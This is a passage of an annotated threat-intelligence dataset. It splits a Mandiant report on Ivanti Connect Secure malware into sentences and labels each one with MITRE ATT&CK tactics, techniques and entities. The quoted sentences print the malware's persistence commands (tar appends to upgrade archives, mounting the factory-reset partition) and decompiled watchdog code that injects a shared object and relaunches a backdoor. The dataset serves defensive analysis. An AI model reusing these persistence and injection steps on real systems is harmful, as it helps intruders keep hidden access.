"Append malicious components to upgrade archive to maintain persistence during system upgrade.", "entities": [ { "text": "intervenes the system upgrade process by appending itself and its constituent components into the archive", "start": 23, "end": 128, "label": "Action" }, { "text": "/tmp/data/root/samba_upgrade.tar", "start": 129, "end": 161, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s79-48a73a", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "If the path exists, it intervenes the system upgrade process by appending itself and its constituent components into the archive /tmp/data/root/samba_upgrade.tar .", "sentence_text": "During a system upgrade process, the appliance decompresses samba_upgrade.tar for data migration purposes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s80-76a75e", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "During a system upgrade process, the appliance decompresses samba_upgrade.tar for data migration purposes.", "sentence_text": "Figure 10 provides the command executed by upgrade_monitor()\nwhen it detects the existence of /tmp/data/root/dev tar -rf /tmp/data/root/samba_upgrade.tar /home/runtime/SparkGateway/plugin.jar /home/runtime/SparkGateway/libchilkat.so /home/runtime/SparkGateway/gateway.conf > /dev/null 2>&1 upgrade_monitor()", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s81-ba2032", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "Figure 10 provides the command executed by upgrade_monitor()\nwhen it detects the existence of /tmp/data/root/dev tar -rf /tmp/data/root/samba_upgrade.tar /home/runtime/SparkGateway/plugin.jar /home/runtime/SparkGateway/libchilkat.so /home/runtime/SparkGateway/gateway.conf > /dev/null 2>&1 upgrade_monitor()", "sentence_text": "During the system upgrade or patch process, the post-install bash script executes the following to decompress samba_upgrade.tar , copying the malicious components ( libchilkat.so , plugin.jar , and gateway.conf ) to the new active partition.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "Execute script to decompress archive and copy malicious components to new partition during upgrade.", "entities": [ { "text": "executes the following to decompress samba_upgrade.tar , copying the malicious components ( libchilkat.so , plugin.jar , and gateway.conf ) to the new active partition", "start": 73, "end": 240, "label": "Action" }, { "text": "samba_upgrade.tar", "start": 110, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "libchilkat.so", "start": 165, "end": 178, "label": "Infrastructure_Indicator" }, { "text": "plugin.jar", "start": 181, "end": 191, "label": "Infrastructure_Indicator" }, { "text": "gateway.conf", "start": 198, "end": 210, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s82-f5859f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "During the system upgrade or patch process, the post-install bash script executes the following to decompress samba_upgrade.tar , copying the malicious components ( libchilkat.so , plugin.jar , and gateway.conf ) to the new active partition.", "sentence_text": "Figure 11 provides the relevant command sequence from post-install tar -tf $upgrade_partition samba_upgrade.tar > /dev/null 2>&1 if [ $? -eq 0 ]; then (cd /; tar -xf $upgrade_partition samba_upgrade.tar >/dev/null)\nfi\nsamba_upgrade.tar\nby\npost-install\nscript\nAttempted Persistence Across Factory Resets", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s83-0c6ec0", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "Figure 11 provides the relevant command sequence from post-install tar -tf $upgrade_partition samba_upgrade.tar > /dev/null 2>&1 if [ $? -eq 0 ]; then (cd /; tar -xf $upgrade_partition samba_upgrade.tar >/dev/null)\nfi\nsamba_upgrade.tar\nby\npost-install\nscript\nAttempted Persistence Across Factory Resets", "sentence_text": "Next, LITTLELAMB.WOOLTEA executes first_run()\n, which reads and checks the hardware of the appliance by reading the first four (4) bytes of the motherboard serial number at /proc/ive/mbserialnumber and adjusts its behavior to mount the root partition of the factory reset image for further modification.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1542", "name": "Pre-OS Boot" } ], "procedure": "Execute initialization routine, read hardware identifiers, and mount root partition to modify system for persistence.", "entities": [ { "text": "executes first_run()", "start": 25, "end": 45, "label": "Action" }, { "text": "reads and checks the hardware of the appliance by reading the first four (4) bytes of the motherboard serial number", "start": 54, "end": 169, "label": "Action" }, { "text": "adjusts its behavior to mount the root partition of the factory reset image for further modification", "start": 202, "end": 302, "label": "Action" }, { "text": "LITTLELAMB.WOOLTEA", "start": 6, "end": 24, "label": "MalwareTool" }, { "text": "/proc/ive/mbserialnumber", "start": 173, "end": 197, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s84-964d42", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "Next, LITTLELAMB.WOOLTEA executes first_run()\n, which reads and checks the hardware of the appliance by reading the first four (4) bytes of the motherboard serial number at /proc/ive/mbserialnumber and adjusts its behavior to mount the root partition of the factory reset image for further modification.", "sentence_text": "Each of the four-byte strings corresponds to a physical Pulse Secure Appliance (PSA) or a Ivanti Secure Appliance (ISA) product.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s85-8e6329", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "Each of the four-byte strings corresponds to a physical Pulse Secure Appliance (PSA) or a Ivanti Secure Appliance (ISA) product.", "sentence_text": "Otherwise, the malware executes the following command to mount /dev/xda5", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute command to mount device partition.", "entities": [ { "text": "executes the following command to mount /dev/xda5", "start": 23, "end": 72, "label": "Action" }, { "text": "/dev/xda5", "start": 63, "end": 72, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s86-f6424f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "Otherwise, the malware executes the following command to mount /dev/xda5", "sentence_text": "(factory reset root partition) on /dev/loop5 if the four (4) bytes do not match any of the machine ID strings or if it fails to read /proc/ive/mbserialnumber /bin/losetup /dev/loop5 /dev/xda5 > /dev/null 2>&1 /dev/xda5", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s87-3e2484", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "(factory reset root partition) on /dev/loop5 if the four (4) bytes do not match any of the machine ID strings or if it fails to read /proc/ive/mbserialnumber /bin/losetup /dev/loop5 /dev/xda5 > /dev/null 2>&1 /dev/xda5", "sentence_text": "Next, LITTLELAMB.WOOLTEA mounts the newly created loop device ( /dev/loop5 ) to /tmp/tmpmnt to modify the factory reset root partition.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "Mount loop device to temporary directory to modify factory reset partition for persistence.", "entities": [ { "text": "mounts the newly created loop device ( /dev/loop5 ) to /tmp/tmpmnt to modify the factory reset root partition", "start": 25, "end": 134, "label": "Action" }, { "text": "LITTLELAMB.WOOLTEA", "start": 6, "end": 24, "label": "MalwareTool" }, { "text": "/dev/loop5", "start": 64, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "/tmp/tmpmnt", "start": 80, "end": 91, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s88-33bdf5", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "Next, LITTLELAMB.WOOLTEA mounts the newly created loop device ( /dev/loop5 ) to /tmp/tmpmnt to modify the factory reset root partition.", "sentence_text": "mkdir -m 777 /tmp/tmpmnt mount /dev/loop5 /tmp/tmpmnt -t ext2 /dev/loop5", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s89-23848b", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "mkdir -m 777 /tmp/tmpmnt mount /dev/loop5 /tmp/tmpmnt -t ext2 /dev/loop5", "sentence_text": "It's important to note that /bin/losetup uses an embedded encryption key within the running version's kernel used to decrypt the running version's partition.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s90-4f0d3f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "It's important to note that /bin/losetup uses an embedded encryption key within the running version's kernel used to decrypt the running version's partition.", "sentence_text": "This encryption key is hardcoded at the time of build compilation and is unique for each appliance version.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s91-27432c", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "This encryption key is hardcoded at the time of build compilation and is unique for each appliance version.", "sentence_text": "However, the factory reset partition maintains its own independent encryption key embedded in the factory kernel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s92-bd58ca", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "However, the factory reset partition maintains its own independent encryption key embedded in the factory kernel.", "sentence_text": "Note that Mandiant and Ivanti conducted forensic analysis on an affected appliance after factory reset to confirm no evidence of malware persistence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s93-995d9e", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "Note that Mandiant and Ivanti conducted forensic analysis on an affected appliance after factory reset to confirm no evidence of malware persistence.", "sentence_text": "Because the appliance had undergone at least one update since its initial deployment, the malware failed to persist through the factory reset as the encryption key of the factory reset kernel and the running version kernel were different.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s94-9db066", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "Because the appliance had undergone at least one update since its initial deployment, the malware failed to persist through the factory reset as the encryption key of the factory reset kernel and the running version kernel were different.", "sentence_text": "If\nlosetup\nhad succeeded in decrypting the factory reset image, the malware would continue its persistence workflow.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s95-b8c1bb", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "If\nlosetup\nhad succeeded in decrypting the factory reset image, the malware would continue its persistence workflow.", "sentence_text": "To modify the factory reset process, it calls the edit_factory_reset()\nfunction that renames the tar binary to tra in the mounted factory reset partition.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s96-ad3ee5", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "To modify the factory reset process, it calls the edit_factory_reset() function that renames the tar binary to tra in the mounted factory reset partition.", "sentence_text": "tar -rf /tmp/tmpmnt/bin/samba_upgrade.tar /home/runtime/SparkGateway/plugin.jar /home/runtime/SparkGateway/libchilkat.so /home/runtime/SparkGateway/gateway.conf > /dev/null 2>&1 samba_upgrade.tar The trojanized tar binary checks for a set of specific conditions to copy the malicious /bin/samba_upgrade.tar to /tmp/samba_upgrade.tar during the factory reset process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s97-d8586a", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "tar -rf /tmp/tmpmnt/bin/samba_upgrade.tar /home/runtime/SparkGateway/plugin.jar /home/runtime/SparkGateway/libchilkat.so /home/runtime/SparkGateway/gateway.conf > /dev/null 2>&1 samba_upgrade.tar The trojanized tar binary checks for a set of specific conditions to copy the malicious /bin/samba_upgrade.tar to /tmp/samba_upgrade.tar during the factory reset process.", "sentence_text": "There are four arguments provided ( argc is equal to 4)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s98-813496", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "There are four arguments provided ( argc is equal to 4)", "sentence_text": "The conditions are satisfied by a component of the factory reset procedure responsible for resetting the configuration ( dsconfigreset ).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s99-7f0828", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "The conditions are satisfied by a component of the factory reset procedure responsible for resetting the configuration ( dsconfigreset ).", "sentence_text": "The utility creates an empty file in /tmp/no-data and archives it using /bin/tar -cf .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s100-fd0e56", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "The utility creates an empty file in /tmp/no-data and archives it using /bin/tar -cf .", "sentence_text": "echo \"\" > /tmp/no-data (cd /tmp; /bin", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s102-f47b78", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "/tar -cf", "sentence_text": "$tmp_part no-data)\ndsconfigreset\nWhen\ndsconfigreset\nexecutes\n/bin/tar -cf $tmp_part no-data , the trojanized tar copies the contents of /bin/samba_upgrade.tar containing its malicious components to /tmp/samba_upgrade.tar in the factory reset root partition (mounted on /tmp/tmpmnt ).", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "Execute trojanized tar to copy malicious archive into factory reset partition to maintain persistence.", "entities": [ { "text": "executes\n/bin/tar -cf $tmp_part no-data , the trojanized tar copies the contents of /bin/samba_upgrade.tar containing its malicious components to /tmp/samba_upgrade.tar in the factory reset root partition", "start": 52, "end": 256, "label": "Action" }, { "text": "/bin/samba_upgrade.tar", "start": 136, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "/tmp/samba_upgrade.tar", "start": 198, "end": 220, "label": "Infrastructure_Indicator" }, { "text": "/tmp/tmpmnt", "start": 269, "end": 280, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s103-537223", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "$tmp_part no-data)\ndsconfigreset\nWhen\ndsconfigreset\nexecutes\n/bin/tar -cf $tmp_part no-data , the trojanized tar copies the contents of /bin/samba_upgrade.tar containing its malicious components to /tmp/samba_upgrade.tar in the factory reset root partition (mounted on /tmp/tmpmnt ).", "sentence_text": "Next, similar to the previously described system upgrade persistence flow, the appliance executes the post-install bash script during the installation process of the new system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s104-519f4c", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "Next, similar to the previously described system upgrade persistence flow, the appliance executes the post-install bash script during the installation process of the new system.", "sentence_text": "This script decompresses the samba_upgrade.tar archive in the factory reset partition, copying the malicious components ( libchilkat.so , plugin.jar , and gateway.conf ) to the new active partition created after the factory reset.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "Decompress archive and copy malicious components to new partition during system reset to maintain persistence.", "entities": [ { "text": "decompresses the samba_upgrade.tar archive in the factory reset partition, copying the malicious components ( libchilkat.so , plugin.jar , and gateway.conf ) to the new active partition", "start": 12, "end": 197, "label": "Action" }, { "text": "samba_upgrade.tar", "start": 29, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "libchilkat.so", "start": 122, "end": 135, "label": "Infrastructure_Indicator" }, { "text": "plugin.jar", "start": 138, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "gateway.conf", "start": 155, "end": 167, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s105-58771f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "This script decompresses the samba_upgrade.tar archive in the factory reset partition, copying the malicious components ( libchilkat.so , plugin.jar , and gateway.conf ) to the new active partition created after the factory reset.", "sentence_text": "Hooking the Web Server Process", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s106-37049a", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "Hooking the Web Server Process", "sentence_text": "The function ensures the persistent injection of another shared object, libaprhelper.so (PITSOCK), into the web process using a built-in injection function named inject_loop()\nPITSOCK hooks the functions accept and setsockopt of the web process by modifying its procedure linkage table (PLT).", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" }, { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "Inject malicious shared object into web process and hook functions by modifying its linkage table.", "entities": [ { "text": "ensures the persistent injection of another shared object, libaprhelper.so (PITSOCK), into the web process using a built-in injection function named inject_loop()", "start": 13, "end": 175, "label": "Action" }, { "text": "hooks the functions accept and setsockopt of the web process by modifying its procedure linkage table (PLT)", "start": 184, "end": 291, "label": "Action" }, { "text": "libaprhelper.so", "start": 72, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "PITSOCK", "start": 89, "end": 96, "label": "MalwareTool" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s107-bdde90", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "The function ensures the persistent injection of another shared object, libaprhelper.so (PITSOCK), into the web process using a built-in injection function named inject_loop()\nPITSOCK hooks the functions accept and setsockopt of the web process by modifying its procedure linkage table (PLT).", "sentence_text": "This enables backdoor communication via the Unix socket /tmp/clientsDownload.sock when it receives a specific 48-byte magic byte sequence in the incoming buffer.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Establish backdoor communication via Unix socket triggered by specific input sequence.", "entities": [ { "text": "enables backdoor communication via the Unix socket /tmp/clientsDownload.sock", "start": 5, "end": 81, "label": "Action" }, { "text": "/tmp/clientsDownload.sock", "start": 56, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s108-17b67f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "This enables backdoor communication via the Unix socket /tmp/clientsDownload.sock when it receives a specific 48-byte magic byte sequence in the incoming buffer.", "sentence_text": "Creating the Malicious SparkGateway Plugin Lastly, libchilkat.so calls persist()\n, which modifies the SparkGateway configuration file.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543", "name": "Create or Modify System Process" } ], "procedure": "Call persist function to modify configuration file for persistence.", "entities": [ { "text": "calls persist()", "start": 65, "end": 80, "label": "Action" }, { "text": "modifies the SparkGateway configuration file", "start": 89, "end": 133, "label": "Action" }, { "text": "libchilkat.so", "start": 51, "end": 64, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s109-eef537", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "Creating the Malicious SparkGateway Plugin Lastly, libchilkat.so calls persist()\n, which modifies the SparkGateway configuration file.", "sentence_text": "plugin = com.toremote.gateway.plugin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s110-f480eb", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "plugin = com.toremote.gateway.plugin.", "sentence_text": "PluginManager pluginFile = /home/runtime/SparkGateway/plugin.jar Backdoor Features libchilkat.so also serves as a stand-alone backdoor that supports expected features such as command execution, file management, shell creation, SOCKS proxy, and network traffic tunneling.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s111-296b61", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "PluginManager pluginFile = /home/runtime/SparkGateway/plugin.jar Backdoor Features libchilkat.so also serves as a stand-alone backdoor that supports expected features such as command execution, file management, shell creation, SOCKS proxy, and network traffic tunneling.", "sentence_text": "It communicates over SSL using the private key located on the Ivanti Connect Secure web server ( /home/webserver/conf/ssl.key/secure.key ) and communicates using the socket /tmp/clientsDownload.sock PITDOG Plugin security.jar (PITDOG) that uses Kubo Injector ( memorysCounter ) to inject a shared object, mem.rd (PITHOOK), into the web process memory, and persistently executes a backdoor, dsAgent (PITSTOP).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1055", "name": "Process Injection" }, { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Communicate over SSL and socket, inject shared object into process memory, and execute persistent backdoor.", "entities": [ { "text": "communicates over SSL using the private key located on the Ivanti Connect Secure web server", "start": 3, "end": 94, "label": "Action" }, { "text": "communicates using the socket /tmp/clientsDownload.sock", "start": 143, "end": 198, "label": "Action" }, { "text": "uses Kubo Injector ( memorysCounter ) to inject a shared object, mem.rd (PITHOOK), into the web process memory", "start": 240, "end": 350, "label": "Action" }, { "text": "persistently executes a backdoor, dsAgent (PITSTOP)", "start": 356, "end": 407, "label": "Action" }, { "text": "/home/webserver/conf/ssl.key/secure.key", "start": 97, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "/tmp/clientsDownload.sock", "start": 173, "end": 198, "label": "Infrastructure_Indicator" }, { "text": "PITDOG", "start": 199, "end": 205, "label": "MalwareTool" }, { "text": "mem.rd", "start": 305, "end": 311, "label": "Infrastructure_Indicator" }, { "text": "PITHOOK", "start": 313, "end": 320, "label": "MalwareTool" }, { "text": "dsAgent", "start": 390, "end": 397, "label": "MalwareTool" }, { "text": "PITSTOP", "start": 399, "end": 406, "label": "MalwareTool" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s112-d1d1cc", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 112, "context_before": "It communicates over SSL using the private key located on the Ivanti Connect Secure web server ( /home/webserver/conf/ssl.key/secure.key ) and communicates using the socket /tmp/clientsDownload.sock PITDOG Plugin security.jar (PITDOG) that uses Kubo Injector ( memorysCounter ) to inject a shared object, mem.rd (PITHOOK), into the web process memory, and persistently executes a backdoor, dsAgent (PITSTOP).", "sentence_text": "Figure 19 shows the relevant excerpts from security.jar public class SparkPlugin implements ManagerInterface { public static void watchdog() { try { Thread.sleep(300000L);\nProcessBuilder processBuilder = new ProcessBuilder(new String[0]);\nProcess process = Runtime.getRuntime().exec(new String", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s113-32778a", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "Figure 19 shows the relevant excerpts from security.jar public class SparkPlugin implements ManagerInterface { public static void watchdog() { try { Thread.sleep(300000L);\nProcessBuilder processBuilder = new ProcessBuilder(new String[0]);\nProcess process = Runtime.getRuntime().exec(new String", "sentence_text": "BufferedReader reader = new BufferedReader(new InputStreamReader (process.getInputStream()));\nString line;\nwhile ((line = reader.readLine()) !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s114-d44d7e", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": "BufferedReader reader = new BufferedReader(new InputStreamReader (process.getInputStream()));\nString line;\nwhile ((line = reader.readLine()) !", "sentence_text": "= null) { int procnum = Integer.parseInt(line);\nString catprocstr = String.format(\"cat /proc/%d/maps | grep mem.rd\", new Object", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s115-3efa4a", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "= null) { int procnum = Integer.parseInt(line);\nString catprocstr = String.format(\"cat /proc/%d/maps | grep mem.rd\", new Object", "sentence_text": "[] { Integer.valueOf(procnum) });\nProcess processinjectres = Runtime.getRuntime().exec(new String[]\n{ \"/bin/sh\", \"-c\", catprocstr });\nBufferedReader processinjectreader = new BufferedReader(new InputStreamReader(processinjectres.getInputStream()));\nif ((line = processinjectreader.readLine())", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s116-94a329", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "[] { Integer.valueOf(procnum) });\nProcess processinjectres = Runtime.getRuntime().exec(new String[]\n{ \"/bin/sh\", \"-c\", catprocstr });\nBufferedReader processinjectreader = new BufferedReader(new InputStreamReader(processinjectres.getInputStream()));\nif ((line = processinjectreader.readLine())", "sentence_text": "== null) { String processinjectstr = String.format(\"/data/runtime/cockpit /memorysCounter", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s117-c820ca", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 117, "context_before": "== null) { String processinjectstr = String.format(\"/data/runtime/cockpit /memorysCounter", "sentence_text": "-p %d /data/runtime/cockpit/mem.rd\", new Object", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s118-dd81c3", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 118, "context_before": "-p %d /data/runtime/cockpit/mem.rd\", new Object", "sentence_text": "[]\n{ Integer.valueOf(procnum) });\nProcess process1 = Runtime.getRuntime().exec(new String", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s119-49371f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "[]\n{ Integer.valueOf(procnum) });\nProcess process1 = Runtime.getRuntime().exec(new String", "sentence_text": "[]\n{ \"/bin/sh\", \"-c\", processinjectstr });\n}\n}\nProcess processps = Runtime.getRuntime().exec(new String[]\n{ \"/bin/sh\", \"-c\", \"ps aux|grep '/data/runtime/cockpit/dsAgent'|grep -v grep | awk '{print $2}'\" });\nBufferedReader readerps = new BufferedReader(new InputStreamReader(processps.getInputStream()));\nif ((line = readerps.readLine())", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s121-18af2f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "== null) {", "sentence_text": "Process processinjectres = Runtime.getRuntime().exec(\"rm -f /data/runtime/cockpit/wd.lock\");\nProcessBuilder processBuilder1 = (new ProcessBuilder(new String[] { \"/data/runtime/cockpit/dsAgent\" })).redirectErrorStream(true);\nProcess process1 = processBuilder1.start();\n}\n} catch (Exception exception) {} } public HandshakeInterface getHandshakePlugin() { long timeInterval = 10000L;\nRunnable runnable = new Runnable() { public void run() { while (true) { SparkPlugin.watchdog();\ntry {\nThread.sleep(10000L);\n} catch (InterruptedException e) { e.printStackTrace();\n}\n}\n}\n};\nThread thread = new Thread(runnable);\nthread.start();\nreturn null;\n}\nThe SparkGateway configuration is modified to load the plugin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s122-333daa", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "Process processinjectres = Runtime.getRuntime().exec(\"rm -f /data/runtime/cockpit/wd.lock\");\nProcessBuilder processBuilder1 = (new ProcessBuilder(new String[] { \"/data/runtime/cockpit/dsAgent\" })).redirectErrorStream(true);\nProcess process1 = processBuilder1.start();\n}\n} catch (Exception exception) {} } public HandshakeInterface getHandshakePlugin() { long timeInterval = 10000L;\nRunnable runnable = new Runnable() { public void run() { while (true) { SparkPlugin.watchdog();\ntry {\nThread.sleep(10000L);\n} catch (InterruptedException e) { e.printStackTrace();\n}\n}\n}\n};\nThread thread = new Thread(runnable);\nthread.start();\nreturn null;\n}\nThe SparkGateway configuration is modified to load the plugin.", "sentence_text": "The security.jar plugin is executed during the negotiation of an RDP connection when the system invokes the Handshake plugin.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute plugin during RDP connection negotiation.", "entities": [ { "text": "is executed during the 